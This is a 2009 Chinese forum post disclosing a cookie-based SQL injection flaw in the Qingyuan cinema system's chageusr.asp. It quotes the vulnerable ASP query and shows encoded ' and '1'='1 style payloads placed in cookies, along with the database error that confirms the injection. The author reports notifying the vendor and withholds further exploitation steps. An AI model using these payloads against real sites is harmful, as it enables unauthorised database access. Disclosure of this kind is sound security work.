找回密码
 注册
搜索
热搜: 回贴
  • 前程无忧官网首页 有什么好的平台可以
  • 最新的销售平台 互联网营销的平台有哪
  • 制作网页的基本流程 网页制作和网页设
  • 【帝国CMS】输出带序号的列表(数字排
  • 网站建设公司 三一,中联,极东泵车的
  • 织梦 建站 织梦网站模版后台怎么更改
  • 云服务官网 哪些网站有免费的简历模板
  • 如何建网站要什么条件 建网站要用什么
  • 吉林市移动公司电话 吉林省退休人员网
  • 设计类毕业论文 网站设计与实现毕业论
查看: 11537|回复: 1

对青苑影院系统部分漏洞分析

[复制链接]
发表于 2009-12-2 01:11:05 | 显示全部楼层 |阅读模式 IP:江苏扬州
作者:非零解
blog:http://www.nonzero.cn

欢迎转载,转载,请注明版权。在公布漏洞之前已经通知了官方。
漏洞:cookies注入
漏洞文件:chageusr.asp等
前提:注册会员
漏洞描述:

set rs=server.createobject("adodb.recordset")
sql="select * from users where userid=’"&request.cookies("userid")&"’ and password=’"&request.cookies("password")&"’"
rs.open sql,conn,1,3

在对cookies的值userid和password未过滤直接执行sql语句,导致sql注入

漏洞利用:

用明小子等cookies修改工具,登陆用户后得到cookies如下:

userid=nonzero; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10%2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI


以userid=nonzero注入,提交userid=nonzero’ and ’1’=’1后sql语句变为:select * from users where userid=’nonzero’ and ’1’=’1’把单引号合闭。首先还要把改为16进制为:%27% 20%61%6E%64%20%27%31%27%3D%27%31,然后提交cookies,如下:


userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%31; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI

页面返回正常,然后再把’ and ’1’=’2编码,提交

userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%32; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI

返回数据为:
错误类型:
ADODB.Field (0x800A0BCD)
BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
/wlgf/www/vod/chageusr.asp, 第 103 行


说明存在注入,具体利用方法,就不说了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-9-30 23:38 , Processed in 0.197814 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表